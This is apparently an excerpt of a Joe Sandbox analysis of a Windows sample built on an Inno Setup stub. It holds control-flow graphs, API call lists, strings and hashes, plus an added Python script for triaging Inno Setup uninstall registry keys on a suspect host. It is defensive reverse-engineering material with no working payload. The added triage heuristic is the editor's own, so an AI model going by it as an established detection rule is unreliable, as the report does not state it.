                                                                              control_flow_graph 1594 472708-47273b 1595 472e26-472e5a call 46d4ec call 403400 * 2 call 403420 1594->1595 1596 472741-472745 1594->1596 1597 47274c-472789 call 40b44c call 4780d8 1596->1597 1607 47278f-4727ce call 47c6f0 call 477d4c call 47ad88 * 2 1597->1607 1608 472e1a-472e20 1597->1608 1620 4727d4-4727db 1607->1620 1621 4727d0 1607->1621 1608->1595 1608->1597 1622 4727f4-47280d 1620->1622 1623 4727dd-4727e4 1620->1623 1621->1620 1626 472833-47283a 1622->1626 1627 47280f-472819 call 472538 1622->1627 1624 4727e6-4727eb call 4529a4 1623->1624 1625 4727f0 1623->1625 1624->1625 1625->1622 1628 47283c-472843 1626->1628 1629 472849-472850 1626->1629 1627->1626 1638 47281b-47282e call 403738 call 42dde8 1627->1638 1628->1629 1632 472cf7-472d2d 1628->1632 1633 4728a3-4728c3 call 47255c 1629->1633 1634 472852-472859 1629->1634 1632->1622 1640 472d33-472d3a 1632->1640 1648 472936-47293d 1633->1648 1649 4728c5-4728ea call 403738 call 42dd0c 1633->1649 1634->1633 1637 47285b-47287d call 403738 call 42dd44 1634->1637 1637->1632 1671 472883-47289e call 403738 RegDeleteValueA RegCloseKey 1637->1671 1638->1626 1644 472d6d-472d74 1640->1644 1645 472d3c-472d46 call 472538 1640->1645 1653 472da7-472dae 1644->1653 1654 472d76-472d80 call 472538 1644->1654 1645->1644 1670 472d48-472d68 call 459ad4 1645->1670 1655 472986 1648->1655 1656 47293f-472963 call 403738 call 42dd44 1648->1656 1676 4728ef-4728f3 1649->1676 1658 472db0-472dd6 call 459ad4 1653->1658 1659 472ddb-472de2 1653->1659 1654->1653 1683 472d82-472da2 call 459ad4 1654->1683 1663 47298b-47298d 1655->1663 1656->1663 1692 472965-472968 1656->1692 1658->1659 1668 472de4-472e0a call 459ad4 1659->1668 1669 472e0f-472e15 call 477d78 1659->1669 1663->1632 1672 472993-4729a8 1663->1672 1668->1669 1669->1608 1670->1644 1671->1632 1681 4729bc-4729c3 1672->1681 1682 4729aa-4729b7 call 403738 RegDeleteValueA 1672->1682 1685 4728f5-4728f9 1676->1685 1686 47291a-472921 1676->1686 1689 472cd9-472cef RegCloseKey 1681->1689 1690 4729c9-4729d0 1681->1690 1682->1681 1683->1653 1685->1663 1693 4728ff-472918 call 47255c 1685->1693 1686->1663 1694 472923-472934 call 46dd50 1686->1694 1696 4729d2-4729e6 call 403738 call 42dc8c 1690->1696 1697 4729ec-4729f9 1690->1697 1692->1663 1699 47296a-472971 1692->1699 1693->1663 1694->1663 1700 4729ff 1697->1700 1699->1663 1704 472973-472984 call 46dd50 1699->1704 1700->1689 1705 472c26-472c41 call 47ad88 call 430acc 1700->1705 1706 472bc4-472bfd call 47ad88 call 406da0 call 403738 RegSetValueExA 1700->1706 1707 472a22-472a2c 1700->1707 1708 472c8b-472cbd call 403574 call 403738 * 2 RegSetValueExA 1700->1708 1704->1663 1739 472c43-472c48 call 4529a4 1705->1739 1740 472c4d-472c6d call 403738 RegSetValueExA 1705->1740 1706->1689 1752 472c03-472c0a 1706->1752 1713 472a35-472a3a 1707->1713 1714 472a2e-472a31 1707->1714 1708->1689 1756 472cbf-472cc6 1708->1756 1723 472a41-472a43 1713->1723 1720 472a33 1714->1720 1721 472a3c 1714->1721 1720->1723 1721->1723 1729 472ae0-472af2 call 40385c 1723->1729 1730 472a49-472a5b call 40385c 1723->1730 1744 472af4-472b0b call 403738 call 42dc80 1729->1744 1745 472b0d-472b10 call 403400 1729->1745 1748 472a76-472a79 call 403400 1730->1748 1749 472a5d-472a74 call 403738 call 42dc74 1730->1749 1739->1740 1740->1689 1758 472c6f-472c76 1740->1758 1744->1745 1762 472b15-472b4e call 47ada8 1744->1762 1745->1762 1761 472a7e-472a85 1748->1761 1749->1748 1749->1761 1752->1689 1759 472c10-472c21 call 46dd50 1752->1759 1756->1689 1763 472cc8-472cd4 call 46dd50 1756->1763 1758->1689 1765 472c78-472c89 call 46dd50 1758->1765 1759->1689 1768 472a87-472aa5 call 403738 RegQueryValueExA 1761->1768 1769 472ab6-472adb call 47ada8 1761->1769 1763->1689 1765->1689 1781 472b50-472b60 call 403574 1762->1781 1782 472b6f-472b9b call 403574 call 403738 * 2 RegSetValueExA 1762->1782 1785 472aa7-472aab 1768->1785 1768->1769 1769->1782 1781->1782 1791 472b62-472b6a call 40357c 1781->1791 1782->1689 1797 472ba1-472ba8 1782->1797 1788 472ab3 1785->1788 1789 472aad-472ab1 1785->1789 1788->1769 1789->1769 1789->1788 1791->1782 1797->1689 1798 472bae-472bbf call 46dd50 1797->1798 1798->1689
                                                                              APIs
                                                                              • RegDeleteValueA.ADVAPI32(?,00000000,?,00000002,00000000,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?,0049B178), ref: 00472890
                                                                              • RegCloseKey.ADVAPI32(?,?,00000000,?,00000002,00000000,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?), ref: 00472899
                                                                                • Part of subcall function 0047255C: GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725E9
                                                                              • RegDeleteValueA.ADVAPI32(?,00000000,00000000,00472CF0,?,?,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?), ref: 004729B7
                                                                                • Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                                • Part of subcall function 0047255C: GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725FF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteErrorLastValue$CloseCreate
                                                                              • String ID: Cannot access 64-bit registry keys on this version of Windows$Failed to parse "qword" value$break$olddata${olddata}
                                                                              • API String ID: 2638610037-3092547568
                                                                              • Opcode ID: 60c61eb47bec3a2eac8f774f64e080f7387afc8de715dc427226ed339478b351
                                                                              • Instruction ID: 0e42c6b5a9d89693cebc7f702fd10ac1157821fa568552e70b891395feb5272a
                                                                              • Opcode Fuzzy Hash: 60c61eb47bec3a2eac8f774f64e080f7387afc8de715dc427226ed339478b351
                                                                              • Instruction Fuzzy Hash: BE320D74E00248AFDB15DFA9D581BDEB7F4AF08304F448066F914AB3A2CB78AD45CB59

                                                                              Control-flow Graph
                                                                              control_flow_graph 1801 4684c8-468500 call 47ad88 1804 468506-468516 call 4778cc 1801->1804 1805 4686e2-4686fc call 403420 1801->1805 1810 46851b-468560 call 4078fc call 403738 call 42dd44 1804->1810 1816 468565-468567 1810->1816 1817 46856d-468582 1816->1817 1818 4686d8-4686dc 1816->1818 1819 468597-46859e 1817->1819 1820 468584-468592 call 42dc74 1817->1820 1818->1805 1818->1810 1822 4685a0-4685c2 call 42dc74 call 42dc8c 1819->1822 1823 4685cb-4685d2 1819->1823 1820->1819 1822->1823 1842 4685c4 1822->1842 1825 4685d4-4685f9 call 42dc74 * 2 1823->1825 1826 46862b-468632 1823->1826 1845 4685fb-468604 call 478558 1825->1845 1846 468609-46861b call 42dc74 1825->1846 1828 468634-468646 call 42dc74 1826->1828 1829 468678-46867f 1826->1829 1843 468656-468668 call 42dc74 1828->1843 1844 468648-468651 call 478558 1828->1844 1831 468681-4686b5 call 42dc74 * 3 1829->1831 1832 4686ba-4686d0 RegCloseKey 1829->1832 1831->1832 1842->1823 1843->1829 1854 46866a-468673 call 478558 1843->1854 1844->1843 1845->1846 1846->1826 1858 46861d-468626 call 478558 1846->1858 1854->1829 1858->1826
                                                                              APIs
                                                                                • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              • RegCloseKey.ADVAPI32(?,004686E2,?,?,00000001,00000000,00000000,004686FD,?,00000000,00000000,?), ref: 004686CB
                                                                              Strings
                                                                              • Inno Setup: User Info: Serial, xrefs: 004686AD
                                                                              • Inno Setup: App Path, xrefs: 0046858A
                                                                              • Inno Setup: Setup Type, xrefs: 004685DA
                                                                              • Inno Setup: User Info: Organization, xrefs: 0046869A
                                                                              • Inno Setup: User Info: Name, xrefs: 00468687
                                                                              • Inno Setup: Selected Components, xrefs: 004685EA
                                                                              • Inno Setup: Deselected Tasks, xrefs: 00468659
                                                                              • Inno Setup: No Icons, xrefs: 004685B3
                                                                              • Inno Setup: Icon Group, xrefs: 004685A6
                                                                              • Inno Setup: Deselected Components, xrefs: 0046860C
                                                                              • Inno Setup: Selected Tasks, xrefs: 00468637
                                                                              • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468527
                                                                              • %s\%s_is1, xrefs: 00468545
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                              • API String ID: 47109696-1093091907
                                                                              • Opcode ID: bf4e5bcefe0dd369e5494d4ffd3574234bc3bf336502117424754692d6e87e56
                                                                              • Instruction ID: 9e5fcdcadd17e924e807c4804dd8b09e3b38f40da8ec3e6eb3bcc5aac06a0e07
                                                                              • Opcode Fuzzy Hash: bf4e5bcefe0dd369e5494d4ffd3574234bc3bf336502117424754692d6e87e56
                                                                              • Instruction Fuzzy Hash: 7751B570A002089BDB11DB65D9416DEB7F5EF49304FA086BEE840A7391EF78AE05CB5D
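The entry above reads the `Inno Setup: ...` values back from `Software\Microsoft\Windows\CurrentVersion\Uninstall\<AppId>_is1`, and the CloseValue entry earlier in this section carries the matching write side (`DisplayName`, `UninstallString`, `QuietUninstallString`, `NoModify`, `_is1`). On a host suspected of having run this sample, those keys are the provenance artefact to check first, because they record where the stub unpacked to and how to remove it. What follows is an added Python example, not code from the Joe Sandbox report or from the sample, that triages a Regedit `.reg` export offline: it parses the string values under each key, keeps the `*_is1` entries and flags those whose `Inno Setup: App Path` lies under a user-writable directory. The sample export is constructed (three invented keys; the `5.4.0 (a)` version string is the one the report lists), and the user-writable-path heuristic is mine, not something the report states.

```python
# Added example, not part of the Joe Sandbox report: triage a Regedit .reg export
# for Inno Setup uninstall entries (the <AppId>_is1 keys and 'Inno Setup: ...'
# values the stub reads and writes). The export below is constructed, and the
# 'installed under a user-writable path' heuristic is my own, not the report's.
import re

# Constructed sample export; the three keys are invented, not from the analysed host.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5A3E}_is1]
"Inno Setup: Setup Version"="5.4.0 (a)"
"Inno Setup: App Path"="C:\\Program Files\\Vendor Tool"
"DisplayName"="Vendor Tool 2.1"
"UninstallString"="\"C:\\Program Files\\Vendor Tool\\unins000.exe\""
"QuietUninstallString"="\"C:\\Program Files\\Vendor Tool\\unins000.exe\" /SILENT"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\UpdSvc_is1]
"Inno Setup: Setup Version"="5.4.0 (a)"
"Inno Setup: App Path"="C:\\Users\\alice\\AppData\\Local\\UpdSvc"
"DisplayName"="UpdSvc"
"UninstallString"="\"C:\\Users\\alice\\AppData\\Local\\UpdSvc\\unins000.exe\""
"NoModify"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OtherApp]
"DisplayName"="Other App (64-bit)"
'''

KEY_RE = re.compile(r"^\[(.+)\]$")
# "name"="value" with the .reg escapes (\\ and \") allowed inside both strings
STR_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
# Paths a standard user can write to; an installer that lands here ran without
# elevation and deserves a second look (heuristic, not a rule from the report).
USER_WRITABLE_RE = re.compile(r"\\Users\\[^\\]+\\AppData\\|\\ProgramData\\|\\Temp\\", re.I)


def _unescape(s):
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text):
    """{key_path: {value_name: string_value}} for the REG_SZ values of a .reg export."""
    keys, cur = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            cur = m.group(1)
            keys[cur] = {}
            continue
        m = STR_RE.match(line)
        if m and cur is not None:          # dword:/hex: values are skipped
            keys[cur][_unescape(m.group(1))] = _unescape(m.group(2))
    return keys


def inno_installs(keys):
    """Uninstall entries written by an Inno Setup stub, in triage-ready form."""
    hits = []
    for path, vals in keys.items():
        if not path.lower().endswith("_is1"):
            continue
        app_path = vals.get("Inno Setup: App Path", "")
        hits.append({
            "key": path,
            "hive": path.split("\\", 1)[0],
            "name": vals.get("DisplayName", ""),
            "setup_version": vals.get("Inno Setup: Setup Version", ""),
            "app_path": app_path,
            "uninstall": vals.get("UninstallString", ""),
            "quiet_uninstall": vals.get("QuietUninstallString", ""),
            "user_writable": bool(USER_WRITABLE_RE.search(app_path)),
        })
    return hits


if __name__ == "__main__":
    for h in inno_installs(parse_reg(SAMPLE_REG)):
        flag = "REVIEW" if h["user_writable"] else "ok"
        print(f'{flag:6} {h["hive"]} {h["name"]!r} -> {h["app_path"]}  [{h["uninstall"]}]')
```

On a live host export the hives with `reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall hklm.reg` and the same for HKCU (and, on 64-bit Windows, the `WOW6432Node` copy, since a 32-bit stub like this one writes there unless it asks for 64-bit mode); `reg export` writes UTF-16, so open the file with `encoding="utf-16"` before passing it to `parse_reg`. Entries flagged REVIEW are not malicious by themselves, since many legitimate per-user installers use AppData, but the `UninstallString` points straight at the `unins000.exe` and install directory to collect.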

                                                                              Control-flow Graph
                                                                              control_flow_graph 2019 47b8dc-47b932 call 42c40c call 4035c0 call 47b558 call 451c38 2028 47b934-47b939 call 4529a4 2019->2028 2029 47b93e-47b94d call 451c38 2019->2029 2028->2029 2033 47b967-47b96d 2029->2033 2034 47b94f-47b955 2029->2034 2037 47b984-47b9ac call 42e2bc * 2 2033->2037 2038 47b96f-47b975 2033->2038 2035 47b977-47b97f call 403494 2034->2035 2036 47b957-47b95d 2034->2036 2035->2037 2036->2033 2041 47b95f-47b965 2036->2041 2045 47b9d3-47b9ed GetProcAddress 2037->2045 2046 47b9ae-47b9ce call 4078fc call 4529a4 2037->2046 2038->2035 2038->2037 2041->2033 2041->2035 2048 47b9ef-47b9f4 call 4529a4 2045->2048 2049 47b9f9-47ba16 call 403400 * 2 2045->2049 2046->2045 2048->2049
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(6FB90000,SHGetFolderPathA), ref: 0047B9DE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc
                                                                              • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$j]I$shell32.dll$shfolder.dll
                                                                              • API String ID: 190572456-2632518235
                                                                              • Opcode ID: 19c183ce3fa01bcadeab013b8c160553b935e57be8875c604a0db8c8468d0ef5
                                                                              • Instruction ID: 54e288ff13d65e77707e80ace3ca021a5634fe8f765e4003a0d502320fe0c017
                                                                              • Opcode Fuzzy Hash: 19c183ce3fa01bcadeab013b8c160553b935e57be8875c604a0db8c8468d0ef5
                                                                              • Instruction Fuzzy Hash: 62311DB0A00249DFCB10EB95D982AEEB7B4EF44308F50847BE554E7352D7389E458BAD

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047B723,?,?,00000000,0049A628,00000000,00000000,?,004969FD,00000000,00496BA6,?,00000000), ref: 0047B643
                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,0047B723,?,?,00000000,0049A628,00000000,00000000,?,004969FD,00000000,00496BA6,?,00000000), ref: 0047B64C
                                                                               Memory Dump Source
                                                                               • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLast
                                                                              • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup$oI$oI
                                                                              • API String ID: 1375471231-857235331
                                                                              • Opcode ID: cbcd31ce72f07627676fb358a31cf6d42b3233dd890dda5219184df80f66688f
                                                                              • Instruction ID: c69cc1ab8f896661f98e1b5ecb406916ff938ef434e98a02422d0df200dcf9d8
                                                                              • Opcode Fuzzy Hash: cbcd31ce72f07627676fb358a31cf6d42b3233dd890dda5219184df80f66688f
                                                                              • Instruction Fuzzy Hash: 45415C34A002099FCB04EFA5D992ADEB7B5EF48309F50843BE51477392DB389E058B99

                                                                               Control-flow Graph (basic blocks with their calls and successor edges; the executed/not-executed colouring of the rendered graph is not recoverable from the text)
                                                                               • 2220: 406334-40634e GetModuleHandleA GetProcAddress -> 2221, 2222
                                                                               • 2221: 406350 -> 2222
                                                                               • 2222: 406357-406364 GetProcAddress -> 2223, 2224
                                                                               • 2223: 406366 -> 2224
                                                                               • 2224: 40636d-40637a GetProcAddress -> 2225, 2226
                                                                               • 2225: 406380-406381
                                                                               • 2226: 40637c-40637e SetProcessDEPPolicy -> 2225
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                              • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                              • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E
                                                                               Memory Dump Source
                                                                               • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModulePolicyProcess
                                                                              • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                              • API String ID: 3256987805-3653653586
                                                                              • Opcode ID: 2d072691014e9b17485d1139902ec2132fd60bbe123d67ee511500e2736c37f1
                                                                              • Instruction ID: d0a9e1fb4642b92a4408cab99680119fc9d423cfedcded744397bec81fc197df
                                                                              • Opcode Fuzzy Hash: 2d072691014e9b17485d1139902ec2132fd60bbe123d67ee511500e2736c37f1
                                                                              • Instruction Fuzzy Hash: C6E026A1380701ACEA1436F20D82F7B10488B40B64B2A14373D5AB91C3D9BDD92459BD

                                                                               Control-flow Graph (basic blocks with their calls and successor edges; the executed/not-executed colouring of the rendered graph is not recoverable from the text)
                                                                               • 2227: 423884-42388e -> 2228, 2229
                                                                               • 2228: 4239b7-4239bb
                                                                               • 2229: 423894-4238b6 call 41f3d4 GetClassInfoA -> 2232, 2233
                                                                               • 2232: 4238e7-4238f0 GetSystemMetrics -> 2234, 2235
                                                                               • 2233: 4238b8-4238cf RegisterClassA -> 2232, 2236
                                                                               • 2234: 4238f2 -> 2235
                                                                               • 2235: 4238f5-4238ff GetSystemMetrics -> 2237, 2238
                                                                               • 2236: 4238d1-4238e2 call 408cc4 call 40311c -> 2232
                                                                               • 2237: 423901 -> 2238
                                                                               • 2238: 423904-423960 call 403738 call 406300 call 403400 call 42365c SetWindowLongA -> 2250, 2251
                                                                               • 2250: 423962-423975 call 424188 SendMessageA -> 2251
                                                                               • 2251: 42397a-4239a8 GetSystemMenu DeleteMenu * 2 -> 2228, 2252
                                                                               • 2252: 4239aa-4239b2 DeleteMenu -> 2228
                                                                              APIs
                                                                                • Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                              • GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
                                                                              • RegisterClassA.USER32(00498630), ref: 004238C7
                                                                              • GetSystemMetrics.USER32(00000000), ref: 004238E9
                                                                              • GetSystemMetrics.USER32(00000001), ref: 004238F8
                                                                              • SetWindowLongA.USER32(00410660,000000FC,0042369C), ref: 00423954
                                                                              • SendMessageA.USER32(00410660,00000080,00000001,00000000), ref: 00423975
                                                                              • GetSystemMenu.USER32(00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
                                                                              • DeleteMenu.USER32(00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
                                                                              • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
                                                                              • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                              • String ID:
                                                                              • API String ID: 183575631-0
                                                                              • Opcode ID: 2e18e7cb37a10cc72f1a00071a2b011d07737f2aabe43150d948db026574d78a
                                                                              • Instruction ID: a1bb8b483c6051ae977dcd30bc5d6258be0549d98267ef4ab912faaf57b8e79c
                                                                              • Opcode Fuzzy Hash: 2e18e7cb37a10cc72f1a00071a2b011d07737f2aabe43150d948db026574d78a
                                                                              • Instruction Fuzzy Hash: 463184B17402006AEB10BF65DC82F6636A89B15308F10017BFA40EF2D7CABDDD40876D

                                                                               Control-flow Graph (basic blocks with their calls and successor edges; the executed/not-executed colouring of the rendered graph is not recoverable from the text)
                                                                               • 2255: 42f3d4-42f3de -> 2256, 2257
                                                                               • 2256: 42f3e0-42f3e3 call 402d30 -> 2257
                                                                               • 2257: 42f3e8-42f425 call 402b30 GetActiveWindow GetFocus call 41eeb4 -> 2263, 2264
                                                                               • 2263: 42f437-42f43f -> 2265, 2266
                                                                               • 2264: 42f427-42f431 RegisterClassA -> 2263
                                                                               • 2265: 42f4c6-42f4e2 SetFocus call 403400
                                                                               • 2266: 42f445-42f476 CreateWindowExA -> 2265, 2267
                                                                               • 2267: 42f478-42f4bc call 42428c call 403738 CreateWindowExA -> 2265, 2274
                                                                               • 2274: 42f4be-42f4c1 ShowWindow -> 2265
                                                                              APIs
                                                                              • GetActiveWindow.USER32 ref: 0042F403
                                                                              • GetFocus.USER32 ref: 0042F40B
                                                                              • RegisterClassA.USER32(004987AC), ref: 0042F42C
                                                                              • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F500,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F46A
                                                                              • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F4B0
                                                                              • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F4C1
                                                                              • SetFocus.USER32(00000000,00000000,0042F4E3,?,?,?,00000001,00000000,?,00457A52,00000000,0049A628), ref: 0042F4C8
                                                                               Memory Dump Source
                                                                               • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                              • String ID: TWindowDisabler-Window
                                                                              • API String ID: 3167913817-1824977358
                                                                              • Opcode ID: c7a7adc83155a0351196465afd34f02b227be391187f6a34a24c1e4424dacc7e
                                                                              • Instruction ID: a85808fe2fc477e6bfefb4b7344e4229cc17534778a3dce562db4a9d559d1a3d
                                                                              • Opcode Fuzzy Hash: c7a7adc83155a0351196465afd34f02b227be391187f6a34a24c1e4424dacc7e
                                                                              • Instruction Fuzzy Hash: 6921A371740710BAE220EF619D03F1B76A4EB14B44FA0813BF904AB2D1D7BC6D5486EE

                                                                               Control-flow Graph (basic blocks with their calls and successor edges; the executed/not-executed colouring of the rendered graph is not recoverable from the text)
                                                                               • 2275: 452850-4528a1 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress -> 2276, 2277
